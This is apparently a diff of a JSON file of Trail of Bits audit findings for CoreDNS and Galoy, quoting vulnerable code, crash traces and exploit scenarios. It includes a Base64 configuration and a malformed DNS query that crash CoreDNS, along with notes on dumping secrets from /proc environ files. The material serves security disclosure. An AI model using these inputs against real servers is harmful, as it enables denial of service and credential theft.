issue. Recommendations Short term, create a copy of n before it is used in the anonymous goroutine. See Appendix B for a proof of concept demonstrating this issue and an example of the x. Long term, integrate anonymous-race-condition Semgrep rule into the CI/CD pipeline to catch this type of race condition.", + "title": "18. Lack of uniform bucket-level access in Terraform state bucket ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "Uniform bucket-level access is not enabled in the bootstrap module bucket used to store the Terraform state. When enabled, this feature implements a uniform permission system, providing access at the bucket level rather than on a per-object basis. It also simplies the access controls / permissions of a bucket, making them easier to manage and reason about. 1 2 3 4 5 6 7 8 resource \"google_storage_bucket\" \"tf_state\" { name = \"${local.name_prefix}-tf-state\" project = local.project location = local.tf_state_bucket_location versioning { enabled = true } force_destroy = local.tf_state_bucket_force_destroy 9 } Figure 18.1: The bucket denition lacks a uniform_bucket_level_access eld set to true . ( modules/bootstrap/gcp/tf-state-bucket.tf#19 ) Exploit Scenario The permissions of some objects in a bucket are miscongured. An attacker takes advantage of that fact to access the Terraform state. Recommendations Short term, enable uniform bucket-level access in this bucket. Long term, integrate automated analysis tools such as tfsec into the development workow to identify any similar issues and areas of improvement.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3022,99 +5770,29 @@ ] }, { - "title": "2. Upstream errors captured in the grpc plugin are not returned ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "In the ServeDNS implementation of the grpc plugin, upstream errors are captured in a loop. However, once an error is captured in the upstreamErr variable, the function exits with a nil error; this is because there is no break statement forcing the function to exit the loop and to reach a return statement, at which point it would return the error value. The ServeDNS function of the forward plugin includes a similar but correct implementation. func (g *GRPC) ServeDNS(ctx context.Context, w dns.ResponseWriter, r *dns.Msg) ( int , error ) { // (...) upstreamErr = err // Check if the reply is correct; if not return FormErr. if !state.Match(ret) { debug.Hexdumpf(ret, \"Wrong reply for id: %d, %s %d\" , ret.Id, state.QName(), state.QType()) formerr := new (dns.Msg) formerr.SetRcode(state.Req, dns.RcodeFormatError) w.WriteMsg(formerr) return 0 , nil } w.WriteMsg(ret) return 0 , nil } if upstreamErr != nil { return dns.RcodeServerFailure, upstreamErr } Figure 2.1: plugin/secondary/setup.go#L19-L53 Exploit Scenario An operator runs CoreDNS with the grpc plugin. Upstream errors cause the gRPC functionality to fail. However, because the errors are not logged, the operator remains unaware of their root cause and has diculty troubleshooting and remediating the issue. Recommendations Short term, correct the ineectual assignment to ensure that errors captured by the plugin are returned. Long term, integrate ineffassign into the CI/CD pipeline to catch this and similar issues.", + "title": "19. Insecure storage of passwords ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "Galoy passwords are stored in conguration les and environment variables or passed in as command-line arguments. There are two issues with this method of storage: (1) the default keys are low entropy (gure 19.1) and (2) the fact that there are default keys in the rst place suggests that users deploying components may not realize that they need to set passwords. 53 export BITCOINDRPCPASS=rpcpassword // (...) 68 export MONGODB_PASSWORD=password // (...) 79 export JWT_SECRET= \"jwt_secret\" Figure 19.1: An example conguration le with passwords ( .envrc#5379 ) Passing in sensitive values through environment variables (gure 19.2) increases the risk of a leak for several reasons: Environment variables are often dumped to external services through crash-logging mechanisms. All processes started by a user can read environment variables from the /proc/$pid/environ le. Attackers often use this ability to dump sensitive values passed in through environment variables (though this requires nding an arbitrary le read vulnerability in the application). An application can also overwrite the contents of a special /proc/$pid/environ le. However, overwriting the le is not as simple as calling setenv(SECRET, \"******\") , because runtimes copy environment variables upon initialization and then operate on the copy. To clear environment variables from that special environ le, one must either overwrite the stack data in which they are located or make a low-level prctl system call with the PR_SET_MM_ENV_START and PR_SET_MM_ENV_END ags enabled to change the memory address of the content the le is rendered from. 12 const jwtSecret = process.env.JWT_SECRET Figure 19.2: src/config/process.ts#12 Certain initialization commands take a password as a command-line argument (gures 19.3 and 19.4). If an attacker gained access to a user account on a system running the script, the attacker would also gain access to any password passed as a command-line argument. 65 66 command : [ '/bin/sh' ] args : 67 - '-c' 68 - | 69 70 71 72 73 if [ ! -f /root/.lnd/data/chain/bitcoin/${NETWORK}/admin.macaroon ]; then while ! test -f /root/.lnd/tls.cert; do sleep 1; done apk update; apk add expect /home/alpine/walletInit.exp ${NETWORK} $LND_PASS fi Figure 19.3: charts/lnd/templates/statefulset.yaml#6573 55 set PASSWORD [lindex $argv 1]; Figure 19.4: charts/lnd/templates/wallet-init-configmap.yaml#55 In Linux, all users can inspect other users commands and their arguments. A user can enable the proc lesystem's hidepid=2 gid=0 mount options to hide metadata about spawned processes from users who are not members of the specied group. However, in many Linux distributions, those options are not enabled by default. Recommendations Short term, take the following actions: Remove the default encryption keys and avoid using any one default key across installs. The user should be prompted to provide a key when deploying the Galoy application, or the application should generate a key using known-good cryptographically secure methods and provide it to the user for safekeeping. Avoid storing encryption keys in conguration les. Conguration les are often broadly readable or rendered as such accidentally. Long term, ensure that keys, passwords, and other sensitive data are never stored in plaintext in the lesystem, and avoid providing default values for that data. Also take the following steps: Document the risks of providing sensitive values through environment variables. Encourage developers to pass sensitive values through standard input or to use a launcher that can fetch them from a service like HashiCorp Vault. Allow developers to pass in those values from a conguration le, but document the fact that the conguration le should not be saved in backups, and provide a warning if the le has overly broad permissions when the program is started.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: High" ] }, - { - "title": "3. Index-out-of-range panic in autopath plugin initialization ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "The following syntax is used to congure the autopath plugin: autopath [ZONE...] RESOLV-CONF The RESOLV-CONF parameter can point to a resolv.conf(5) conguration le or to another plugin, if the string in the resolv variable is prexed with an @ symbol (e.g., @kubernetes). However, the autoPathParse function does not ensure that the length of the RESOLV-CONF parameter is greater than zero before dereferencing its rst element and comparing it with the @ character. func autoPathParse(c *caddy.Controller) (*AutoPath, string , error ) { ap := &AutoPath{} mw := \"\" for c.Next() { zoneAndresolv := c.RemainingArgs() if len (zoneAndresolv) < 1 { return ap, \"\" , fmt.Errorf( \"no resolv-conf specified\" ) } resolv := zoneAndresolv[ len (zoneAndresolv)- 1 ] if resolv[ 0 ] == '@' { mw = resolv[ 1 :] Figure 3.1: The length of resolv may be zero when the rst element is checked. ( plugin/autopath/setup.go#L45-L54 ) Specifying a conguration le with a zero-length RESOLV-CONF parameter, as shown in gure 3.2, would cause CoreDNS to panic. 0 autopath \"\" Figure 3.2: An autopath conguration with a zero-length RESOLV-CONF parameter panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/autopath.autoPathParse(0xc000518870) /home/ubuntu/audit-coredns/client-code/coredns/plugin/autopath/setup.go:53 +0x35c github.com/coredns/coredns/plugin/autopath.setup(0xc000518870) /home/ubuntu/audit-coredns/client-code/coredns/plugin/autopath/setup.go:16 +0x33 github.com/coredns/caddy.executeDirectives(0xc00029eb00, {0x7ffdc770671b, 0x8}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc000543260, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x22394b8, 0xc0003e8a00}, 0xc0003e8a00, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x22394b8, 0xc0003e8a00}, 0xc00029eb00, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x22394b8, 0xc0003e8a00}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 3.3: CoreDNS panics when loading the autopath conguration. Exploit Scenario An operator of a CoreDNS server provides an empty RESOLV-CONF parameter when conguring the autopath plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is dicult for the operator to troubleshoot and x the issue. Recommendations Short term, verify that the resolv variable is a non-empty string before indexing it. Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe denial of service (DoS).", - "labels": [ - "Trail of Bits", - "Severity: Low", - "Difficulty: High" - ] - }, - { - "title": "4. Index-out-of-range panic in forward plugin initialization ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "Initializing the forward plugin involves parsing the relevant conguration section. func parseStanza(c *caddy.Controller) (*Forward, error ) { f := New() if !c.Args(&f.from) { return f, c.ArgErr() } origFrom := f.from zones := plugin.Host(f.from).NormalizeExact() f.from = zones[ 0 ] // there can only be one here, won't work with non-octet reverse Figure 4.1: The length of the zones variable may be zero when the rst element is checked. ( plugin/forward/setup.go#L89-L97 ) An invalid conguration le for the forward plugin could cause the zones variable to have a length of zero. A Base64-encoded example of such a conguration le is shown in gure 4.2. Lgpmb3J3YXJkIE5vTWF0Pk69VL0vvVN0ZXJhbENoYXJDbGFzc0FueUNoYXJOb3ROTEEniez6bnlDaGFyQmVnaW5MaW5l RW5kTGluZUJlZ2luVGV4dEVuZFRleHRXb3JkQm91bmRhcnlOb1dvYXRpbmcgc3lzdGVtIDogImV4dCIsICJ4ZnMiLCAi bnRTaW50NjRLaW5kZnMiLiB5IGluZmVycmVkIHRvIGJlIGV4dCBpZiB1bnNwZWNpZmllZCBlIDogaHR0cHM6Di9rdWJl cm5ldGVzaW9kb2NzY29uY2VwdHNzdG9yYWdldm9sdW1lcyMgIiIiIiIiIiIiIiIiJyCFmIWlsZj//4WuhZilr4WY5bCR mPCd Figure 4.2: The Base64-encoded forward conguration le Specifying a conguration le like that shown above would cause CoreDNS to panic when attempting to access the rst element of zones : panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/forward.parseStanza(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:97 +0x972 github.com/coredns/coredns/plugin/forward.parseForward(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:81 +0x5e github.com/coredns/coredns/plugin/forward.setup(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:22 +0x33 github.com/coredns/caddy.executeDirectives(0xc0000ea800, {0x7ffdf9f6e6ed, 0x36}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc00056a860, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x22394b8, 0xc00024ea80}, 0xc00024ea80, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x22394b8, 0xc00024ea80}, 0xc0000ea800, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x22394b8, 0xc00024ea80}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 4.3: CoreDNS panics when loading the forward conguration. Exploit Scenario An operator of a CoreDNS server miscongures the forward plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is dicult for the operator to troubleshoot and x the issue. Recommendations Short term, verify that the zones variable has the correct number of elements before indexing it. Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe DoS.", - "labels": [ - "Trail of Bits", - "Severity: Informational", - "Difficulty: High" - ] - }, - { - "title": "5. Use of deprecated PreferServerCipherSuites eld ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "In the setTLSDefaults function of the tls plugin, the TLS conguration object includes a PreferServerCipherSuites eld, which is set to true . func setTLSDefaults(tls *ctls.Config) { tls.MinVersion = ctls.VersionTLS12 tls.MaxVersion = ctls.VersionTLS13 tls.CipherSuites = [] uint16 { ctls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305, ctls.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305, ctls.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256, ctls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, ctls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, } tls.PreferServerCipherSuites = true } Figure 5.1: plugin/tls/tls.go#L22-L37 In the past, this property controlled whether a TLS connection would use the cipher suites preferred by the server or by the client. However, as of Go 1.17, this eld is ignored. According to the Go documentation for crypto/tls , Servers now select the best mutually supported cipher suite based on logic that takes into account inferred client hardware, server hardware, and security. When CoreDNS is built using a recent Go version, the use of this property is redundant and may lead to false assumptions about how cipher suites are negotiated in a connection to a CoreDNS server. Recommendations Short term, add this issue to the internal issue tracker. Additionally, when support for Go versions older than 1.17 is entirely phased out of CoreDNS, remove the assignment to the deprecated PreferServerCipherSuites eld.", - "labels": [ - "Trail of Bits", - "Severity: Low", - "Difficulty: High" - ] - }, - { - "title": "6. Use of the MD5 hash function to detect Corele changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "The reload plugin is designed to automatically detect changes to a Corele and to reload it if necessary. To determine whether a le has changed, the plugin periodically compares the current MD5 hash of the le to the last hash calculated for it ( plugin/reload/reload.go#L81-L107 ). If the values are dierent, it reloads the Corele. However, the MD5 hash functions vulnerability to collisions decreases the reliability of this process; if two dierent les produce the same hash value, the plugin will not detect the dierence between them. Exploit Scenario An operator of a CoreDNS server modies a Corele, but the MD5 hash of the modied le collides with that of the old le. As a result, the reload plugin does not detect the change. Instead, it continues to use the outdated server conguration without alerting the operator to its use. Recommendations Short term, improve the robustness of the reload plugin by using the SHA-512 hash function instead of MD5.", - "labels": [ - "Trail of Bits", - "Severity: Low", - "Difficulty: High" - ] - }, - { - "title": "7. Use of default math/rand seed in grpc and forward plugins random server-selection policy ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "The grpc and forward plugins use the random policy for selecting upstream servers. The implementation of this policy in the two plugins is identical and uses the math/rand package from the Go standard library. func (r *random) List(p []*Proxy) []*Proxy { switch len (p) { case 1 : return p case 2 : if rand.Int()% 2 == 0 { return []*Proxy{p[ 1 ], p[ 0 ]} // swap } return p } perms := rand.Perm( len (p)) rnd := make ([]*Proxy, len (p)) for i, p1 := range perms { rnd[i] = p[p1] } return rnd } Figure 7.1: plugin/grpc/policy.go#L19-L37 As highlighted in gure 7.1, the random policy uses either rand.Int or rand.Perm to choose the order of the upstream servers, depending on the number of servers that have been congured. Unless a program using the random policy explicitly calls rand.Seed , the top-level functions rand.Int and rand.Perm behave as if they were seeded with the value 1 , which is the default seed for math/rand . CoreDNS does not call rand.Seed to seed the global state of math/rand . Without this call, the grpc and forward plugins random selection of upstream servers is likely to be trivially predictable and the same every time CoreDNS is restarted. Exploit Scenario An attacker targets a CoreDNS instance in which the grpc or forward plugin is enabled. The attacker exploits the deterministic selection of upstream servers to overwhelm a specic server, with the goal of causing a DoS condition or performing an attack such as a timing attack. Recommendations Short term, instantiate a rand.Rand type with a unique seed, rather than drawing random numbers from the global math/rand state. CoreDNS takes this approach in several other areas, such as the loop plugin .", - "labels": [ - "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Medium" - ] - }, - { - "title": "8. Cache plugin does not account for hash table collisions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "To cache a DNS reply, CoreDNS maps the FNV-1 hash of the query name and type to the content of the reply in a hash table entry. func key(qname string , m *dns.Msg, t response.Type) ( bool , uint64 ) { // We don't store truncated responses. if m.Truncated { return false , 0 } // Nor errors or Meta or Update. if t == response.OtherError || t == response.Meta || t == response.Update { return false , 0 } return true , hash(qname, m.Question[ 0 ].Qtype) } func hash(qname string , qtype uint16 ) uint64 { h := fnv.New64() h.Write([] byte { byte (qtype >> 8 )}) h.Write([] byte { byte (qtype)}) h.Write([] byte (qname)) return h.Sum64() } Figure 8.1: plugin/cache/cache.go#L68-L87 To check whether there is a cached reply for an incoming query, CoreDNS performs a hash table lookup for the query name and type. If it identies a reply with a valid time to live (TTL), it returns the reply. CoreDNS assumes the stored DNS reply to be the correct one for the query, given the use of a hash table mapping. However, this assumption is faulty, as FNV-1 is a non-cryptographic hash function that does not oer collision resistance, and there exist utilities for generating colliding inputs to FNV-1 . As a result, it is likely possible to construct a valid (qname , qtype) pair that collides with another one, in which case CoreDNS could serve the incorrect cached reply to a client. Exploit Scenario An attacker aiming to poison the cache of a CoreDNS server generates a valid (qname* , qtype*) pair whose FNV-1 hash collides with a commonly queried (qname , qtype) pair. The attacker gains control of the authoritative name server for qname* and points its qtype* record to an address of his or her choosing. The attacker also congures the server to send a second record when (qname* , qtype*) is queried: a qtype record for qname that points to a malicious address. The attacker queries the CoreDNS server for (qname* , qtype*) , and the server caches the reply with the malicious address. Soon thereafter, when a legitimate user queries the server for (qname , qtype) , CoreDNS serves the user the cached reply for (qname* , qtype*) , since it has an identical FNV-1 hash. As a result, the legitimate users DNS client sees the malicious address as the record for qname . Recommendations Short term, store the original name and type of a query in the value of a hash table entry. After looking up the key for an incoming request in the hash table, verify that the query name and type recorded alongside the cached reply match those of the request. If they do not, disregard the cached reply. Short term, use the keyed hash function SipHash instead of FNV-1. SipHash was designed for speed and derives a 64-bit output value from an input value and a 128-bit secret key; this method adds pseudorandomness to a hash table key and makes it more dicult for an attacker to generate collisions oine. CoreDNS should use the crypto/rand package from Gos standard library to generate a cryptographically random secret key for SipHash on startup.", - "labels": [ - "Trail of Bits", - "Severity: High", - "Difficulty: Medium" - ] - }, - { - "title": "9. Index-out-of-range reference in kubernetes plugin ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "The parseRequest function of the kubernetes plugin parses a DNS request before using it to query Kubernetes. By fuzzing the function, we discovered an out-of-range issue that can cause a panic. The issue occurs when the function calls stripUnderscore with an empty string, as it does when it receives a request with the qname .o.o.po.pod.8 and the zone interwebs. // stripUnderscore removes a prefixed underscore from s. func stripUnderscore(s string ) string { if s[ 0 ] != '_' { return s } return s[ 1 :] } Figure 9.1: plugin/kubernetes/parse.go#L97 Because of the time constraints of the audit, we could not nd a way to directly exploit this vulnerability. Although certain tools for sending DNS queries, like dig and host , verify the validity of a host before submitting a DNS query, it may be possible to exploit the vulnerability by using custom tooling or DNS over HTTPs (DoH). Exploit Scenario An attacker nds a way to submit a query with an invalid host (such as o.o.po.pod.8) to a CoreDNS server running as the DNS server for a Kubernetes endpoint. Because of the index-out-of-range bug, the kubernetes plugin causes CoreDNS to panic and crash, resulting in a DoS. Recommendations Short term, to prevent a panic, implement a check of the value of the string passed to the stripUnderscore function.", - "labels": [ - "Trail of Bits", - "Severity: High", - "Difficulty: Medium" - ] - }, - { - "title": "10. Calls to time.After() in select statements can lead to memory leaks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "Calls to the time.After function in select/case statements within for loops can lead to memory leaks. This is because the garbage collector does not clean up the underlying Timer object until the timer has red. A new timer is initialized at the start of each iteration of the for loop (and therefore with each select statement), which requires resources. As a result, if many routines originate from a time.After call, the system may experience memory overconsumption. for { select { case <-ctx.Done(): log.Debugf( \"Breaking out of CloudDNS update loop for %v: %v\" , h.zoneNames, ctx.Err()) return case <-time.After( 1 * time.Minute) : if err := h.updateZones(ctx); err != nil && ctx.Err() == nil /* Don't log error if ctx expired. */ { log.Errorf( \"Failed to update zones %v: %v\" , h.zoneNames, err) } Figure 10.1: A time.After() routine that causes a memory leak ( plugin/clouddns/clouddns.go#L85-L93 ) The following portions of the code contain similar patterns: plugin/clouddns/clouddns.go#L85-L93 plugin/azure/azure.go#L87-96 plugin/route53/route53.go#87-96 Exploit Scenario An attacker nds a way to overuse a function, which leads to overconsumption of a CoreDNS servers memory and a crash. Recommendations Short term, use a ticker instead of the time.After function in select/case statements included in for loops. This will prevent memory leaks and crashes caused by memory exhaustion. Long term, avoid using the time.After method in for-select routines and periodically use a Semgrep query to detect similar patterns in the code. References DevelopPaper post on the memory leak vulnerability in time.After Golang <-time.After() Is Not Garbage Collected before Expiry (Medium post)", + { + "title": "20. Third-party container images are not version pinned ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The continuous integration (CI) pipeline and Helm charts reference third-party components such as Docker registry images by named tags (or by no tag at all). Registry tags are not immutable; if an attacker compromised an image publishers account, the pipeline or Kubernetes cluster could be provided a malicious container image. 87 - name : build-chain-dl-image 88 89 90 91 92 93 94 95 96 97 98 serial : true plan : - { get : chain-dl-image-def , trigger : true } - task : build privileged : true config : platform : linux image_resource : type : registry-image source : repository : vito/oci-build-task Figure 20.1: A third-party image referenced without an explicit tag ( ci/pipeline.yml#8798 ) 270 resource_types : 271 - name : terraform 272 273 274 275 type : docker-image source : repository : ljfranklin/terraform-resource tag : latest Figure 20.2: An image referenced by the latest tag ( ci/pipeline.yml#270275 ) Exploit Scenario An attacker gains access to a Docker Hub account hosting an image used in the CI pipeline. The attacker then tags a malicious container image and pushes it to Docker Hub. The CI pipeline retrieves the tagged malicious image and uses it to execute tasks. Recommendations Short term, refer to Docker images by SHA-256 digests to prevent the use of an incorrect or modied image. Long term, integrate automated tools such as Checkov into the development workow to detect similar issues in the codebase.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "11. Incomplete list of debugging data exposed by the prometheus plugin ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "Enabling the prometheus (metrics) plugin exposes an HTTP endpoint that lists CoreDNS metrics. The documentation for the plugin indicates that it reports data such as the total number of queries and the size of responses. However, other data that is reported by the plugin (and also available through the pprof plugin) is not listed in the documentation. This includes Go runtime debugging information such as the number of running goroutines and the duration of Go garbage collection runs. Because this data is not listed in the prometheus plugin documentation, operators may initially be unaware of its exposure. Moreover, the data could be instrumental in formulating an attack. # TYPE go_gc_duration_seconds summary go_gc_duration_seconds{quantile=\"0\"} 4.4756e-05 go_gc_duration_seconds{quantile=\"0.25\"} 6.0522e-05 go_gc_duration_seconds{quantile=\"0.5\"} 7.1476e-05 go_gc_duration_seconds{quantile=\"0.75\"} 0.000105802 go_gc_duration_seconds{quantile=\"1\"} 0.000205775 go_gc_duration_seconds_sum 0.010425592 go_gc_duration_seconds_count 123 # HELP go_goroutines Number of goroutines that currently exist. # TYPE go_goroutines gauge go_goroutines 18 # HELP go_info Information about the Go environment. # TYPE go_info gauge go_info{version=\"go1.17.3\"} 1 # HELP go_memstats_alloc_bytes Number of bytes allocated and still in use. # TYPE go_memstats_alloc_bytes gauge Figure 11.1: Examples of the data exposed by prometheus and omitted from the documentation Exploit Scenario An attacker discovers the metrics exposed by CoreDNS over port 9253. The attacker then monitors the endpoint to determine the eectiveness of various attacks in crashing the server. Recommendations Short term, document all data exposed by the prometheus plugin. Additionally, consider changing the data exposed by the prometheus plugin to exclude Go runtime data available through the pprof plugin.", + "title": "21. Compute instances do not leverage Shielded VM features ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The bastion host denition does not enable all of Google Clouds Shielded VM (virtual machine) features for Compute Engine VM instances. These features provide veriable integrity of VM instances and assurance that VM instances have not been compromised by boot- or kernel-level malware or rootkits. Three features provide this veriable integrity: Secure Boot, virtual trusted platform module (vTPM)-enabled Measured Boot, and integrity monitoring. Google also oers Shielded GKE nodes, which are built on top of Shielded VMs and provide strong veriable node identity and integrity to increase the security of GKE nodes. The node pool denition does enable this feature but disables Secure Boot checks on the node instances. 168 169 170 shielded_instance_config { enable_secure_boot = false enable_integrity_monitoring = true 171 } Figure 21.1: Secure Boot is disabled. ( modules/platform/gcp/kube.tf#168171 ) Exploit Scenario The bastion host is compromised, and persistent kernel-level malware is installed. Because the bastion host is still operational, the malware remains undetected for an extended period. Recommendations Short term, enable these security features to increase the security and trustworthiness of the infrastructure. Long term, integrate automated analysis tools such as tfsec into the development workow to detect other areas of improvement in the solution. References What is Shielded VM? , Compute Engine documentation Using GKE Shielded Nodes, GKE documentation", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3122,79 +5800,79 @@ ] }, { - "title": "12. Cloud integrations require cleartext storage of keys in the Corele ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "The route53 , azure , and clouddns plugins enable CoreDNS to interact with cloud providers (AWS, Azure, and the Google Cloud Platform (GCP), respectively). To access clouddns , a user enters the path to the le containing his or her GCP credentials. When using route53 , CoreDNS pulls the AWS credentials that the user has entered in the Corele. If the AWS credentials are not included in the Corele, CoreDNS will pull them in the same way that the AWS command-line interface (CLI) would. While operators have options for the way that they provide AWS and GCP credentials, Azure credentials must be pulled directly from the Corele. Furthermore, the CoreDNS documentation lacks guidance on the risks of storing AWS, Azure, or GCP credentials in local conguration les . Exploit Scenario An attacker or malicious internal user gains access to a server running CoreDNS. The malicious actor then locates the Corele and obtains credentials for a cloud provider, thereby gaining access to a cloud infrastructure. Recommendations Short term, remove support for entering cloud provider credentials in the Corele in cleartext. Instead, load credentials for each provider in the manner recommended in that providers documentation and implemented by its CLI utility. CoreDNS should also refuse to load credential les with overly broad permissions and warn users about the risks of such les.", + "title": "22. Excessive container permissions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "Kubernetes containers launch processes under user and group IDs corresponding to users and groups on the host system. Container processes that are running as root usually have more permissions than their workload requires. If such a process were compromised, the permissions would enable the attacker to perform further attacks against the container or host. Kubernetes provides several ways to further limit these permissions, such as disabling the allowPrivilegeEscalation ag to ensure that a child process of a container cannot gain more privileges than its parent, dropping all Linux capabilities, and enforcing Seccomp and AppArmor proles. We found several instances of containers run as root, with allowPrivilegeEscalation enabled by omission (gure 22.1) or with low user IDs that overlap with host user IDs (gure 22.2). In some of the containers, Linux capabilities were not dropped (gure 22.2), and neither Seccomp nor AppArmor proles were enabled. 24 containers : 25 - name : auth-backend 26 27 28 29 30 image : \"{{ .Values.image.repository }}@{{ .Values.image.digest }}\" ports : - containerPort : 3000 env : - (...) Figure 22.1: Without a securityContext eld, commands will run as root and a container will allow privilege escalation by default. ( charts/galoy-auth/charts/auth-backend/templates/deployment.yaml#2430 ) 38 39 40 41 42 43 44 45 securityContext : # capabilities: # drop: # - ALL readOnlyRootFilesystem : true runAsNonRoot : true runAsUser : 1000 runAsGroup : 3000 Figure 22.2: User ID 1000 is typically used by the rst non-system user account. ( charts/bitcoind/values.yaml#3845 ) Exploit Scenario An attacker is able to trigger remote code execution in the Web Wallet application. The attacker then leverages the lax permissions to exploit CVE-2022-0185, a buer overow vulnerability in the Linux kernel that allows her to obtain root privileges and escape the Kubernetes pod. The attacker then gains the ability to execute code on the host system. Recommendations Short term, review and adjust the securityContext conguration of all charts used by the Galoy system. Run pods as non-root users with high user IDs that will not overlap with host user IDs. Drop all unnecessary capabilities, and enable security policy enforcement when possible. Long term, integrate automated tools such as Checkov into the CI pipeline to detect areas of improvement in the solution. Additionally, review the Docker recommendations outlined in appendix E . References Kubernetes container escape using Linux Kernel exploit , CrowdStrike 10 Kubernetes Security Context settings you should understand, snyk", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "13. Lack of rate-limiting controls ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "CoreDNS does not enforce rate limiting of DNS queries, including those sent via DoH. As a result, we were able to issue the same request thousands of times in less than one minute over the HTTP endpoint /dns-query . Figure 13.1: We sent 3,424 requests to CoreDNS without being rate limited. During our tests, the lack of rate limiting did not appear to aect the application. However, processing requests sent at such a high rate can consume an inordinate amount of host resources, and a lack of rate limiting can facilitate DoS and DNS amplication attacks. Exploit Scenario An attacker oods a CoreDNS server with HTTP requests, leading to a DoS condition. Recommendations Short term, consider incorporating the rrl plugin, used for the rate limiting of DNS queries, into the CoreDNS codebase. Additionally, implement rate limiting on all API endpoints. An upper bound can be applied at a high level to all endpoints exposed by CoreDNS. Long term, run stress tests to ensure that the rate limiting enforced by CoreDNS is robust.", + "title": "23. Unsigned and unversioned Grafana BigQuery Datasource plugin ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The BigQuery Datasource plugin is installed as part of the Grafana conguration found in the Helm charts. The plugin, which is unsigned, is pulled directly from the master branch of the doitintl/bigquery-grafana GitHub repository, and signature checks for the plugin are disabled. Grafana advises against running unsigned plugins. 10 11 plugins : - https://github.com/doitintl/bigquery-grafana/archive/master.zip ;doit-bigquery-dataso urce 12 13 14 15 grafana.ini : plugins : allow_loading_unsigned_plugins : \"doitintl-bigquery-datasource\" Figure 23.1: The plugin is downloaded directly from the GitHub repository, and signature checks are disabled. ( charts/monitoring/values.yaml#1015 ) Exploit Scenario An attacker compromises the doitintl/bigquery-grafana 